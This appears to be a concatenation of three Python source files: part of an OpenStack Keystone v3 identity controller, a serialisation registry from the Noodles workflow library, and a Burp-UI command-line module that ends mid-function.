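#   {'id': 'u1', 'name': 'alice', 'domain_id': 'default',
#    'default_project_id': 'p1'}
# is returned as
#   {'id': 'u1', 'name': 'alice', 'username': 'alice', 'tenantId': 'p1'}
# i.e. domain_id is dropped, default_project_id becomes tenantId, and
# username mirrors name.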
@dependency.requires('policy_api', 'token_provider_api')
class V3Controller(wsgi.Application):
"""Base controller class for Identity API v3.
Child classes should set the ``collection_name`` and ``member_name`` class
attributes, representing the collection of entities they are exposing to
the API. This is required for supporting self-referential links,
pagination, etc.
Class parameters:
* `_mutable_parameters` - set of parameters that can be changed by users.
Usually used by cls.check_immutable_params()
* `_public_parameters` - set of parameters that are exposed to the user.
Usually used by cls.filter_params()
"""
collection_name = 'entities'
member_name = 'entity'
get_member_from_driver = None
@classmethod
def base_url(cls, context, path=None):
endpoint = super(V3Controller, cls).base_url(context, 'public')
if not path:
path = cls.collection_name
return '%s/%s/%s' % (endpoint, 'v3', path.lstrip('/'))
@classmethod
def full_url(cls, context, path=None):
url = cls.base_url(context, path)
if context['environment'].get('QUERY_STRING'):
url = '%s?%s' % (url, context['environment']['QUERY_STRING'])
return url
@classmethod
def query_filter_is_true(cls, filter_value):
"""Determine if bool query param is 'True'.
We treat this the same way as we do for policy
enforcement:
{bool_param}=0 is treated as False.
Any other value is considered to be equivalent to
True, including the absence of a value.
"""
if (isinstance(filter_value, six.string_types) and
filter_value == '0'):
val = False
else:
val = True
return val
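# Example (illustrative): a query string of '?enabled=0' yields False here,
# while '?enabled=1', '?enabled=true' or a bare '?enabled' (empty value) all
# yield True, mirroring how boolean parameters are interpreted for policy
# enforcement.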
@classmethod
def _add_self_referential_link(cls, context, ref):
ref.setdefault('links', {})
ref['links']['self'] = cls.base_url(context) + '/' + ref['id']
@classmethod
def wrap_member(cls, context, ref):
cls._add_self_referential_link(context, ref)
return {cls.member_name: ref}
@classmethod
def wrap_collection(cls, context, refs, hints=None):
"""Wrap a collection, checking for filtering and pagination.
Returns the wrapped collection, which includes:
- Executing any filtering not already carried out
- Truncating to a set limit if necessary
- Adding 'self' links to every member
- Adding 'next', 'self' and 'previous' links for the whole collection.
:param context: the current context, containing the original url path
and query string
:param refs: the list of members of the collection
:param hints: list hints, containing any relevant filters and limit.
Any filters already satisfied by managers will have been
removed
"""
# Check if there are any filters in hints that were not
# handled by the drivers. The driver will not have paginated or
# limited the output if it found there were filters it was unable to
# handle.
if hints is not None:
refs = cls.filter_by_attributes(refs, hints)
list_limited, refs = cls.limit(refs, hints)
for ref in refs:
cls.wrap_member(context, ref)
container = {cls.collection_name: refs}
container['links'] = {
'next': None,
'self': cls.full_url(context, path=context['path']),
'previous': None}
if list_limited:
container['truncated'] = True
return container
@classmethod
def limit(cls, refs, hints):
"""Limits a list of entities.
The underlying driver layer may have already truncated the collection
for us, but in case it was unable to handle truncation we check here.
:param refs: the list of members of the collection
:param hints: hints, containing, among other things, the limit
requested
:returns: boolean indicating whether the list was truncated, as well
as the list of (truncated if necessary) entities.
"""
NOT_LIMITED = False
LIMITED = True
if hints is None or hints.limit is None:
# No truncation was requested
return NOT_LIMITED, refs
if hints.limit.get('truncated', False):
# The driver did truncate the list
return LIMITED, refs
if len(refs) > hints.limit['limit']:
# The driver layer wasn't able to truncate it for us, so we must
# do it here
return LIMITED, refs[:hints.limit['limit']]
return NOT_LIMITED, refs
@classmethod
def filter_by_attributes(cls, refs, hints):
"""Filters a list of references by filter values."""
def _attr_match(ref_attr, val_attr):
"""Matches attributes allowing for booleans as strings.
We test explicitly for a value that defines it as 'False',
which also means that the existence of the attribute with
no value implies 'True'
"""
if type(ref_attr) is bool:
return ref_attr == utils.attr_as_boolean(val_attr)
else:
return ref_attr == val_attr
def _inexact_attr_match(filter, ref):
"""Applies an inexact filter to a result dict.
:param filter: the filter in question
:param ref: the dict to check
:returns: True if there is a match
"""
comparator = filter['comparator']
key = filter['name']
if key in ref:
filter_value = filter['value']
target_value = ref[key]
if not target_value:
# NOTE(garcianavalon) prevent exceptions!
return False
if not filter['case_sensitive']:
# We only support inexact filters on strings so
# it's OK to use lower()
filter_value = filter_value.lower()
target_value = target_value.lower()
if comparator == 'contains':
return (filter_value in target_value)
elif comparator == 'startswith':
return target_value.startswith(filter_value)
elif comparator == 'endswith':
return target_value.endswith(filter_value)
else:
# We silently ignore unsupported filters
return True
return False
for filter in hints.filters:
if filter['comparator'] == 'equals':
attr = filter['name']
value = filter['value']
refs = [r for r in refs if _attr_match(
utils.flatten_dict(r).get(attr), value)]
else:
# It might be an inexact filter
refs = [r for r in refs if _inexact_attr_match(
filter, r)]
return refs
@classmethod
def build_driver_hints(cls, context, supported_filters):
"""Build list hints based on the context query string.
:param context: contains the query_string from which any list hints can
be extracted
:param supported_filters: list of filters supported, so ignore any
keys in query_dict that are not in this list.
"""
query_dict = context['query_string']
hints = driver_hints.Hints()
if query_dict is None:
return hints
for key in query_dict:
# Check if this is an exact filter
if supported_filters is None or key in supported_filters:
hints.add_filter(key, query_dict[key])
continue
# Check if it is an inexact filter
for valid_key in supported_filters:
# See if this entry in query_dict matches a known key with an
# inexact suffix added. If it doesn't match, then that just
# means that there is no inexact filter for that key in this
# query.
if not key.startswith(valid_key + '__'):
continue
base_key, comparator = key.split('__', 1)
# We map the query-style inexact of, for example:
#
# {'email__contains', 'myISP'}
#
# into a list directive add filter call parameters of:
#
# name = 'email'
# value = 'myISP'
# comparator = 'contains'
# case_sensitive = True
case_sensitive = True
if comparator.startswith('i'):
case_sensitive = False
comparator = comparator[1:]
hints.add_filter(base_key, query_dict[key],
comparator=comparator,
case_sensitive=case_sensitive)
# NOTE(henry-nash): If we were to support pagination, we would pull any
# pagination directives out of the query_dict here, and add them into
# the hints list.
return hints
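# Example of the inexact-filter mapping described above (illustrative): a
# query entry 'name__icontains=ali', with 'name' in supported_filters, ends
# up as
#   hints.add_filter('name', 'ali', comparator='contains',
#                    case_sensitive=False)
# whereas a plain 'name=alice' is added as an exact (equality) filter.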
def _require_matching_id(self, value, ref):
"""Ensures the value matches the reference's ID, if any."""
if 'id' in ref and ref['id'] != value:
raise exception.ValidationError('Cannot change ID')
def _require_matching_domain_id(self, ref_id, ref, get_member):
"""Ensure the current domain ID matches the reference one, if any.
Provided we want domain IDs to be immutable, check whether any
domain_id specified in the ref dictionary matches the existing
domain_id for this entity.
:param ref_id: the ID of the entity
:param ref: the dictionary of new values proposed for this entity
:param get_member: The member function to call to get the current
entity
:raises: :class:`keystone.exception.ValidationError`
"""
# TODO(henry-nash): It might be safer and more efficient to do this
# check in the managers affected, so look to migrate this check to
# there in the future.
if CONF.domain_id_immutable and 'domain_id' in ref:
existing_ref = get_member(ref_id)
if ref['domain_id'] != existing_ref['domain_id']:
raise exception.ValidationError(_('Cannot change Domain ID'))
def _assign_unique_id(self, ref):
"""Generates and assigns a unique identifier to a reference."""
ref = ref.copy()
ref['id'] = uuid.uuid4().hex
return ref
def _get_domain_id_for_list_request(self, context):
"""Get the domain_id for a v3 list call.
If we are running with multiple domain drivers, then the caller must
specify a domain_id either as a filter or as part of the token scope.
"""
if not CONF.identity.domain_specific_drivers_enabled:
# We don't need to specify a domain ID in this case
return
if context['query_string'].get('domain_id') is not None:
return context['query_string'].get('domain_id')
try:
token_ref = token_model.KeystoneToken(
token_id=context['token_id'],
token_data=self.token_provider_api.validate_token(
context['token_id']))
except KeyError:
raise exception.ValidationError(
_('domain_id is required as part of entity'))
except (exception.TokenNotFound,
exception.UnsupportedTokenVersionException):
LOG.warning(_('Invalid token found while getting domain ID '
'for list request'))
raise exception.Unauthorized()
if token_ref.domain_scoped:
return token_ref.domain_id
else:
LOG.warning(
_('No domain information specified as part of list request'))
raise exception.Unauthorized()
def _get_domain_id_from_token(self, context):
"""Get the domain_id for a v3 create call.
In the case of a v3 create entity call that does not specify a domain
ID, the spec says that we should use the domain scoping from the token
being used.
"""
# We could make this more efficient by loading the domain_id
# into the context in the wrapper function above (since
# this version of normalize_domain will only be called inside
# a v3 protected call). However, this optimization is probably not
# worth the duplication of state
try:
token_ref = token_model.KeystoneToken(
token_id=context['token_id'],
token_data=self.token_provider_api.validate_token(
context['token_id']))
except KeyError:
# This might happen if we use the Admin token, for instance
raise exception.ValidationError(
_('A domain-scoped token must be used'))
except (exception.TokenNotFound,
exception.UnsupportedTokenVersionException):
LOG.warning(_('Invalid token found while getting domain ID '
'for list request'))
raise exception.Unauthorized()
if token_ref.domain_scoped:
return token_ref.domain_id
else:
# TODO(henry-nash): We should issue an exception here since if
# a v3 call does not explicitly specify the domain_id in the
# entity, it should be using a domain scoped token. However,
# the current tempest heat tests issue a v3 call without this.
# This is raised as bug #1283539. Once this is fixed, we
# should remove the line below and replace it with an error.
return CONF.identity.default_domain_id
def _normalize_domain_id(self, context, ref):
"""Fill in domain_id if not specified in a v3 call."""
if 'domain_id' not in ref:
ref['domain_id'] = self._get_domain_id_from_token(context)
return ref
@staticmethod
def filter_domain_id(ref):
"""Override v2 filter to let domain_id out for v3 calls."""
return ref
def check_protection(self, context, prep_info, target_attr=None):
"""Provide call protection for complex target attributes.
As well as including the standard parameters from the original API
call (which is passed in prep_info), this call will add in any
additional entities or attributes (passed in target_attr), so that
they can be referenced by policy rules.
"""
if 'is_admin' in context and context['is_admin']:
LOG.warning(_('RBAC: Bypassing authorization'))
else:
action = 'identity:%s' % prep_info['f_name']
# TODO(henry-nash) need to log the target attributes as well
creds = _build_policy_check_credentials(self, action,
context,
prep_info['input_attr'])
# Build the dict the policy engine will check against from both the
# parameters passed into the call we are protecting (which was
# stored in the prep_info by protected()), plus the target
# attributes provided.
policy_dict = {}
if target_attr:
policy_dict = {'target': target_attr}
policy_dict.update(prep_info['input_attr'])
self.policy_api.enforce(creds,
action,
utils.flatten_dict(policy_dict))
LOG.debug('RBAC: Authorization granted')
@classmethod
def check_immutable_params(cls, ref):
"""Raise exception when disallowed parameter is in ref.
Check whether the ref dictionary representing a request has only
mutable parameters included. If not, raise an exception. This method
checks only root-level keys from a ref dictionary.
:param ref: a dictionary representing deserialized request to be
stored
:raises: :class:`keystone.exception.ImmutableAttributeError`
"""
ref_keys = set(ref.keys())
blocked_keys = ref_keys.difference(cls._mutable_parameters)
if not blocked_keys:
# No immutable parameters changed
return
exception_args = {'target': cls.__name__,
'attributes': ', '.join(blocked_keys)}
raise exception.ImmutableAttributeError(**exception_args)
@classmethod
def filter_params(cls, ref):
"""Remove unspecified parameters from the dictionary.
This function removes unspecified parameters from the dictionary. See
check_immutable_parameters for corresponding function that raises
exceptions. This method checks only root-level keys from a ref
dictionary.
:param ref: a dictionary representing deserialized response to be
serialized
"""
ref_keys = set(ref.keys())
blocked_keys = ref_keys - cls._public_parameters
for blocked_param in blocked_keys:
del ref[blocked_param]
return ref
|
|
import inspect
from itertools import count
from pathlib import Path
import base64
try:
from dataclasses import is_dataclass # noqa
from .dataclass import SerDataClass
except ImportError:
def is_dataclass(x):
return False
def SerDataClass():
return None
from ..interface import (Fail, PromisedObject, Quote)
from ..lib import (object_name, look_up, importable, unwrap, is_unwrapped)
from ..workflow import (Workflow, NodeData, FunctionNode, ArgumentAddress,
ArgumentKind, reset_workflow, get_workflow)
from .registry import (Registry, Serialiser, SerUnknown)
from .reasonable import (Reasonable, SerReasonableObject)
from .path import (SerPath)
def ismethod(x):
if inspect.ismethod(x):
return True
if type(x).__name__ == 'builtin_function_or_method' \
and hasattr(x, '__self__'):
return True
return False
class SerAuto(Serialiser):
def __init__(self):
super(SerAuto, self).__init__('<automagic>')
def encode(self, obj, make_rec):
return obj.__serialize__(make_rec)
def decode(self, cls, data):
return cls.__construct__(data)
class SerByMembers(Serialiser):
def __init__(self, cls, members):
super().__init__(cls)
self.members = members
def encode(self, obj, make_rec):
return make_rec({
m: getattr(obj, m) for m in self.members
})
def decode(self, cls, data):
return cls(**data)
class SerDict(Serialiser):
def __init__(self):
super(SerDict, self).__init__(dict)
def encode(self, obj, make_rec):
return make_rec(dict(obj))
def decode(self, cls, data):
return cls(data)
class SerBytes(Serialiser):
def __init__(self):
super(SerBytes, self).__init__(bytes)
def encode(self, obj, make_rec):
return make_rec(base64.b64encode(obj).decode())
def decode(self, cls, data):
return base64.b64decode(data.encode())
class SerSequence(Serialiser):
"""Tuples get converted to lists during serialisation.
We want to get tuples back, so make this explicit."""
def __init__(self, cls):
super().__init__(cls)
def encode(self, obj, make_rec):
return make_rec(list(obj))
def decode(self, cls, data):
return cls(data)
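# Rationale sketch: JSON has no tuple or set type, so a plain round trip
# would hand back a list. Registering SerSequence for tuple and set (see
# registry() below) records the original class, letting decode() rebuild
# e.g. (1, 2, 3) rather than [1, 2, 3].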
class SerEnum(Serialiser):
def __init__(self, cls):
super(SerEnum, self).__init__(cls)
def encode(self, obj, make_rec):
return make_rec(obj.name)
def decode(self, cls, data):
return cls[data]
class SerNamedTuple(Serialiser):
def __init__(self, cls):
super(SerNamedTuple, self).__init__(cls)
def encode(self, obj, make_rec):
return make_rec(dict(obj._asdict()))
def decode(self, cls, data):
return cls(**data)
class SerSlice(Serialiser):
def __init__(self):
super(SerSlice, self).__init__(slice)
def encode(self, obj, make_rec):
return make_rec([obj.start, obj.stop, obj.step])
def decode(self, cls, data):
return slice(*data)
def _remap_links(remap, links):
return [{'node': remap[source],
'to': [{'node': remap[node],
'address': address}
for node, address in target]}
for source, target in links.items()]
class SerWorkflow(Serialiser):
def __init__(self):
super(SerWorkflow, self).__init__(Workflow)
def encode(self, obj, make_rec):
remap = dict(zip(obj.nodes.keys(), count()))
return make_rec({'root': remap[obj.root],
'nodes': list(obj.nodes.values()),
'links': _remap_links(remap, obj.links)})
def decode(self, cls, data):
root = data['root']
nodes = dict(zip(count(), data['nodes']))
links = {l['node']: {(target['node'], target['address'])
for target in l['to']}
for l in data['links']}
return reset_workflow(Workflow(root, nodes, links))
class SerPromisedObject(Serialiser):
def __init__(self):
super(SerPromisedObject, self).__init__(PromisedObject)
def encode(self, obj, make_rec):
return make_rec({'workflow': get_workflow(obj)})
def decode(self, cls, data):
return PromisedObject(data['workflow'])
class SerMethod(Serialiser):
def __init__(self):
super(SerMethod, self).__init__('<method>')
def encode(self, obj, make_rec):
return make_rec({'class': object_name(obj.__member_of__),
'method': obj.__name__})
def decode(self, cls, data):
cls = look_up(data['class'])
return unwrap(getattr(cls, data['method']))
class SerBoundMethod(Serialiser):
def __init__(self):
super(SerBoundMethod, self).__init__('<boundmethod>')
def encode(self, obj, make_rec):
return make_rec({
'self': obj.__self__,
'name': obj.__name__})
def decode(self, _, data):
return getattr(data['self'], data['name'])
class SerImportable(Serialiser):
def __init__(self):
super(SerImportable, self).__init__('<importable>')
def encode(self, obj, make_rec):
return make_rec(object_name(obj))
def decode(self, cls, data):
return look_up(data)
class SerNode(Serialiser):
def __init__(self):
super(SerNode, self).__init__(FunctionNode)
def encode(self, obj, make_rec):
return make_rec(dict(obj.data._asdict()))
def decode(self, cls, data):
return FunctionNode.from_node_data(NodeData(**data))
def _noodles_hook(obj):
if '__member_of__' in dir(obj) and obj.__member_of__:
return '<method>'
if importable(obj):
return '<importable>'
if ismethod(obj):
return '<boundmethod>'
if is_unwrapped(obj):
return '<unwrapped>'
if hasattr(obj, '__serialize__') and hasattr(type(obj), '__construct__'):
return '<automagic>'
if is_dataclass(type(obj)) and not isinstance(obj, type):
return '<dataclass>'
return None
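# Dispatch sketch (illustrative): for a bound method obj.method,
# _noodles_hook() returns '<boundmethod>', so the registry below serialises
# it with SerBoundMethod (storing the instance and the method name) instead
# of the object itself; a return value of None means the object falls back to
# the type-based lookup in the registry.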
class SerUnwrapped(Serialiser):
def __init__(self):
return super().__init__('<unwrapped>')
def encode(self, obj, make_rec):
return make_rec(object_name(obj))
def decode(self, cls, data):
return unwrap(look_up(data))
def registry():
"""Returns the Noodles base serialisation registry."""
return Registry(
types={
dict: SerDict(),
tuple: SerSequence(tuple),
set: SerSequence(set),
bytes: SerBytes(),
slice: SerSlice(),
complex: SerByMembers(complex, ['real', 'imag']),
Reasonable: SerReasonableObject(Reasonable),
ArgumentKind: SerEnum(ArgumentKind),
FunctionNode: SerNode(),
ArgumentAddress: SerNamedTuple(ArgumentAddress),
Workflow: SerWorkflow(),
PromisedObject: SerPromisedObject(),
Quote: SerReasonableObject(Quote),
Path: SerPath(),
Fail: SerReasonableObject(Fail)
},
hooks={
'<method>': SerMethod(),
'<boundmethod>': SerBoundMethod(),
'<importable>': SerImportable(),
'<automagic>': SerAuto(),
'<unwrapped>': SerUnwrapped(),
'<dataclass>': SerDataClass()
},
hook_fn=_noodles_hook,
default=SerUnknown(),
)
|
|
# -*- coding: utf8 -*-
"""
Burp-UI is a web-ui for burp backup written in python with Flask and
jQuery/Bootstrap
.. module:: burpui.cli
:platform: Unix
:synopsis: Burp-UI CLI module.
.. moduleauthor:: Ziirish <[email protected]>
"""
import os
import sys
import time
import click
if os.getenv("BUI_MODE") in ["server", "ws"] or "websocket" in sys.argv:
try:
from gevent import monkey
monkey.patch_socket()
except ImportError:
pass
from .app import create_app # noqa
from .exceptions import BUIserverException # noqa
try:
from flask_socketio import SocketIO # noqa
WS_AVAILABLE = True
except ImportError:
WS_AVAILABLE = False
ROOT = os.path.dirname(os.path.realpath(__file__))
DEBUG = os.getenv("BUI_DEBUG") or os.getenv("FLASK_DEBUG") or False
DEBUG = DEBUG and DEBUG.lower() not in ["false", "no", "0"]
VERBOSE = os.getenv("BUI_VERBOSE") or 0
if VERBOSE:
try:
VERBOSE = int(VERBOSE)
except ValueError:
VERBOSE = 0
# UNITTEST is used to skip the burp-2 requirements for modes != server
UNITTEST = os.getenv("BUI_MODE") not in ["server", "manage", "celery", "legacy", "ws"]
CLI = os.getenv("BUI_MODE") not in ["server", "legacy"]
app = create_app(
conf=os.environ.get("BUI_CONFIG"),
verbose=VERBOSE,
logfile=os.environ.get("BUI_LOGFILE"),
debug=DEBUG,
gunicorn=False,
unittest=UNITTEST,
cli=CLI,
websocket_server=(os.getenv("BUI_MODE") == "ws" or "websocket" in sys.argv),
)
try:
from .extensions import create_db
from .ext.sql import db
from flask_migrate import Migrate
# This may have been reset by create_app
if isinstance(app.database, bool):
app.config["WITH_SQL"] = app.database
else:
app.config["WITH_SQL"] = app.database and app.database.lower() != "none"
if app.config["WITH_SQL"]:
create_db(app, True)
mig_dir = os.getenv("BUI_MIGRATIONS")
if mig_dir:
migrate = Migrate(app, db, mig_dir)
else:
migrate = Migrate(app, db)
except ImportError:
pass
# Utilities functions
def _die(error, appli=None):
appli = " '{}'".format(appli) if appli else ""
err(
"Unable to initialize the application{}: {}".format(appli, error),
)
sys.exit(2)
def _log(message, *args, color=None, err=False):
msg = message % args if args else message
if color is not None:
msg = click.style(msg, fg=color)
click.echo(msg, err=err)
def log(message="", *args):
_log(message, *args)
def ok(message="", *args):
_log(message, *args, color="green")
def info(message="", *args):
_log(message, *args, color="blue")
def warn(message="", *args):
_log(message, *args, color="yellow")
def err(message="", *args, err=True):
_log(message, *args, color="red", err=err)
@app.cli.command()
def legacy():
"""Legacy server for backward compatibility."""
warn(
"If you want to pass options, you should run 'python -m burpui "
"-m legacy [...]' instead",
)
app.manual_run()
@app.cli.command()
@click.option(
"-b",
"--bind",
default="127.0.0.1",
help="Which address to bind to for the websocket server",
)
@click.option(
"-p",
"--port",
default=5001,
help="Which port to listen on for the websocket server",
)
@click.option(
"-d",
"--debug",
default=False,
is_flag=True,
help="Whether to start the websocket server in debug mode",
)
def websocket(bind, port, debug):
"""Start a new websocket server."""
try:
from .ext.ws import socketio
except ImportError:
_die(
"Missing requirement, did you ran 'pip install" ' "burp-ui[websocket]"\'?',
"websocket",
)
socketio.run(app, host=bind, port=port, debug=debug)
@app.cli.command()
@click.option(
"-b", "--backend", default="BASIC", help="User Backend (default is BASIC)."
)
@click.option("-p", "--password", help="Password to assign to user.", default=None)
@click.option(
"-a",
"--ask",
default=False,
is_flag=True,
help="If no password is provided and this flag is enabled, "
"you'll be prompted for one, else a random one will be "
"generated.",
)
@click.option(
"-v", "--verbose", default=False, is_flag=True, help="Add extra debug messages."
)
@click.argument("name")
def create_user(backend, password, ask, verbose, name):
"""Create a new user."""
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
if not backend.endswith(":AUTH"):
backend = f"{backend}:AUTH"
backend = backend.upper()
if msg:
_die(msg, "create_user")
info("[*] Adding '{}' user...".format(name))
try:
handler = getattr(app, "uhandler")
except AttributeError:
handler = None
if not handler or len(handler.backends) == 0 or backend not in handler.backends:
err("[!] No authentication backend found")
sys.exit(1)
back = handler.backends[backend]
if back.add_user is False:
err("[!] The '{}' backend does not support user creation".format(backend))
sys.exit(2)
if not password:
if ask:
import getpass
password = getpass.getpass()
confirm = getpass.getpass("Confirm: ")
if password != confirm:
err("[!] Passwords mismatch")
sys.exit(3)
else:
import random
alphabet = (
"abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLM" "NOPQRSTUVWXYZ"
)
pw_length = 8
mypw = ""
for i in range(pw_length):
next_index = random.randrange(len(alphabet))
mypw += alphabet[next_index]
password = mypw
info("[+] Generated password: {}".format(password))
success, message, _ = back.add_user(name, password)
_log(
"[+] Success: {}{}".format(
success, " -> {}".format(message) if verbose and message else ""
),
color="green" if success else "red",
)
@app.cli.command()
@click.option("-p", "--password", help="Password to assign to user.", default=None)
@click.option(
"-u",
"--username",
help="Provide the username to get the full " "configuration line.",
default=None,
)
@click.option(
"-b",
"--batch",
default=False,
is_flag=True,
help="Don't be extra verbose so that you can use the output "
"directly in your scripts. Requires both -u and -p.",
)
def hash_password(password, username, batch):
"""Hash a given password to fill the configuration file."""
from werkzeug.security import generate_password_hash
if batch and (not username or not password):
err(
"You need to provide both a username and a password using the "
"-u and -p flags!",
)
sys.exit(1)
askpass = False
if not password:
askpass = True
import getpass
password = getpass.getpass()
hashed = generate_password_hash(password)
if not batch:
log("'{}' hashed into: {}".format(password if not askpass else "*" * 8, hashed))
if username:
if not batch:
info("#8<{}".format("-" * 77))
log("{} = {}".format(username, hashed))
if not batch:
info("#8<{}".format("-" * 77))
@app.cli.command()
@click.argument("language")
def init_translation(language):
"""Initialize a new translation for the given language."""
try:
import babel # noqa
except ImportError:
warn("Missing i18n requirements, giving up")
return
os.chdir(os.path.join(ROOT, ".."))
os.system(
"pybabel extract -F babel.cfg -k __ -k lazy_gettext -o messages.pot burpui"
)
os.system(
"pybabel init -i messages.pot -d burpui/translations -l {}".format(language)
)
os.unlink("messages.pot")
@app.cli.command()
def update_translation():
"""Update translation files."""
try:
import babel # noqa
except ImportError:
warn("Missing i18n requirements, giving up")
return
os.chdir(os.path.join(ROOT, ".."))
os.system(
"pybabel extract -F babel.cfg -k __ -k lazy_gettext -o messages.pot burpui"
)
os.system("pybabel update -i messages.pot -d burpui/translations")
os.unlink("messages.pot")
@app.cli.command()
def compile_translation():
"""Compile translations."""
try:
import babel # noqa
except ImportError:
warn("Missing i18n requirements, giving up")
return
os.chdir(os.path.join(ROOT, ".."))
os.system("pybabel compile -f -d burpui/translations")
@app.cli.command()
@click.option(
"-b",
"--burp-conf-cli",
"bconfcli",
default=None,
help="Burp client configuration file",
)
@click.option(
"-s",
"--burp-conf-serv",
"bconfsrv",
default=None,
help="Burp server configuration file",
)
@click.option(
"-c",
"--client",
default="bui",
help="Name of the burp client that will be used by Burp-UI " '(defaults to "bui")',
)
@click.option(
"-l",
"--listen",
default="0.0.0.0:5971",
help="Setup a custom listen port for the Burp-UI restorations",
)
@click.option(
"-h",
"--host",
default="::1",
help='Address of the status server (defaults to "::1")',
)
@click.option("-r", "--redis", default=None, help="Redis URL to connect to")
@click.option(
"-d",
"--database",
default=None,
help="Database to connect to for persistent storage",
)
@click.option("-p", "--plugins", default=None, help="Plugins location")
@click.option("-m", "--monitor", default=None, help="bui-monitor configuration file")
@click.option(
"-i", "--monitor-listen", "mbind", default=None, help="bui-monitor bind address"
)
@click.option(
"-C",
"--concurrency",
default=None,
type=click.INT,
help="Number of concurrent requests addressed to the monitor",
)
@click.option(
"-P",
"--pool-size",
"pool",
default=None,
type=click.INT,
help="Number of burp-client processes to spawn in the monitor",
)
@click.option(
"-B",
"--backend",
default=None,
help="Switch to another backend",
type=click.Choice(["burp2", "parallel"]),
)
@click.option(
"-a",
"--assume-version",
"assume",
default=None,
help="If we cannot determine server version use this one",
)
@click.option(
"-n",
"--dry",
is_flag=True,
help="Dry mode. Do not edit the files but display changes",
)
def setup_burp(
bconfcli,
bconfsrv,
client,
listen,
host,
redis,
database,
plugins,
monitor,
mbind,
concurrency,
pool,
backend,
assume,
dry,
):
"""Setup burp client for burp-ui."""
if app.config["BACKEND"] not in ["burp2", "parallel"] and not backend:
err("Sorry, you can only setup the 'burp2' and the 'parallel' backends")
sys.exit(1)
if not app.config["STANDALONE"]:
err("Sorry, only the standalone mode is supported")
sys.exit(1)
if concurrency:
from multiprocessing import cpu_count
if concurrency > cpu_count():
warn(
"Warning: setting a concurrency level higher than the available CPU"
" count might cause you some troubles"
)
if pool and concurrency:
if concurrency > pool:
warn(
"Warning: setting a concurrency level higher than the available"
" processes in the monitor is not recommended"
)
is_parallel = app.config["BACKEND"] == "parallel" or (
backend and backend == "parallel"
)
# enforce burp2 backend for the configuration
app.config["BACKEND"] = "burp2"
try:
msg = app.load_modules()
except Exception as e:
msg = str(e)
if msg:
_die(msg, "setup-burp")
from .misc.parser.utils import Config
from .misc.backend.utils.constant import BURP_LISTEN_OPTION, BURP_BIND_MULTIPLE
from .app import get_redis_server
from .config import BUIConfig
import difflib
import tempfile
if monitor:
monconf = BUIConfig(monitor)
monconf_orig = []
mon_orig = mon_source = monitor
if dry:
try:
with open(monitor) as fil:
monconf_orig = fil.readlines()
except:
pass
(_, temp) = tempfile.mkstemp()
monconf.options.filename = temp
parser = app.client.get_parser()
server_version = app.client.get_server_version() or assume
orig = source = None
conf_orig = []
if dry:
try:
with open(app.conf.options.filename) as fil:
conf_orig = fil.readlines()
except:
pass
orig = source = app.conf.options.filename
(_, temp) = tempfile.mkstemp()
app.conf.options.filename = temp
# handle migration of old config files
if app.conf.section_exists("Burp2"):
if app.conf.rename_section("Burp2", "Burp", source):
info("Renaming old [Burp2] section")
app.conf._refresh(True)
refresh = False
if not app.conf.lookup_section("Burp", source):
refresh = True
if not app.conf.lookup_section("Global", source):
refresh = True
if (database or redis) and not app.conf.lookup_section("Production", source):
refresh = True
if concurrency and not app.conf.lookup_section("Parallel", source):
refresh = True
if refresh:
app.conf._refresh(True)
if monitor and not monconf.lookup_section("Global", mon_source):
monconf._refresh(True)
def _edit_conf(key, val, attr, section="Burp", obj=app.client, conf=app.conf):
if val and (
(key not in conf.options[section])
or (key in conf.options[section] and val != conf.options[section][key])
):
adding = key not in conf.options[section]
conf.options[section][key] = val
conf.options.write()
if obj:
setattr(obj, attr, val)
if adding:
msg = f'Adding new option "{key}={val}" to section [{section}] in {conf.conffile}'
else:
msg = f'Updating option "{key}={val}" in section [{section}] in {conf.conffile}'
info(msg)
return True
return False
def _color_diff(line):
if line.startswith("+"):
return click.style(line, fg="green")
elif line.startswith("-"):
return click.style(line, fg="red")
elif line.startswith("^"):
return click.style(line, fg="blue")
return line
refresh = False
refresh |= _edit_conf("bconfcli", bconfcli, "burpconfcli")
refresh |= _edit_conf("bconfsrv", bconfsrv, "burpconfsrv")
refresh |= _edit_conf("plugins", plugins, "plugins", "Global", app)
if backend:
refresh |= _edit_conf("backend", backend, None, "Global", None)
if is_parallel and concurrency:
refresh |= _edit_conf("concurrency", concurrency, None, "Parallel", None)
if mbind:
refresh |= _edit_conf("host", mbind, None, "Parallel", None)
if refresh:
app.conf._refresh(True)
refresh = False
if monitor and pool:
refresh |= _edit_conf("pool", pool, None, "Global", None, monconf)
if monitor and mbind:
refresh |= _edit_conf("bind", mbind, None, "Global", None, monconf)
if monitor:
refresh |= _edit_conf("bconfcli", bconfcli, None, "Burp", None, monconf)
if refresh:
monconf._refresh(True)
if monitor and app.config["BACKEND"] == "parallel":
mon_password = monconf.options["Global"].get("password")
back_password = app.conf.options["Parallel"].get("password")
if mon_password != back_password:
click.echo(
click.style(
"Backend password does not match monitor password", fg="yellow"
)
)
if redis:
try:
# detect missing modules
import redis as redis_client # noqa
import celery # noqa
import socket
if (
"redis" not in app.conf.options["Production"]
or "redis" in app.conf.options["Production"]
and app.conf.options["Production"]["redis"] != redis
) and app.redis != redis:
app.conf.options["Production"]["redis"] = redis
app.redis = redis
rhost, rport, _ = get_redis_server(app)
ret = -1
for _ in range(10):
if ret == 0:
break
for res in socket.getaddrinfo(
rhost, rport, socket.AF_UNSPEC, socket.SOCK_STREAM
):
if ret == 0:
break
af, socktype, proto, _, sa = res
try:
s = socket.socket(af, socktype, proto)
except socket.error:
continue
try:
ret = s.connect_ex(sa)
except:
continue
time.sleep(1)
if ret == 0:
app.conf.options["Production"]["celery"] = "true"
app.conf.options["Production"]["storage"] = "redis"
app.conf.options["Production"]["cache"] = "redis"
else:
warn("Unable to contact the redis server, disabling it")
app.conf.options["Production"]["storage"] = "default"
app.conf.options["Production"]["cache"] = "default"
if app.use_celery:
app.conf.options["Production"]["celery"] = "false"
app.conf.options.write()
app.conf._refresh(True)
except ImportError:
warn(
"Unable to activate redis & celery. Did you ran the "
"'pip install burp-ui[celery]' and "
"'pip install burp-ui[gunicorn-extra]' commands first?"
)
if database:
try:
from .ext.sql import db # noqa
if (
"database" not in app.conf.options["Production"]
or "database" in app.conf.options["Production"]
and app.conf.options["Production"]["database"] != database
) and app.database != database:
app.conf.options["Production"]["database"] = database
app.conf.options.write()
app.conf._refresh(True)
except ImportError:
warn(
"It looks like some dependencies are missing. Did you ran "
"the 'pip install \"burp-ui[sql]\"' command first?"
)
if dry:
temp = app.conf.options.filename
app.conf.options.filename = orig
after = []
try:
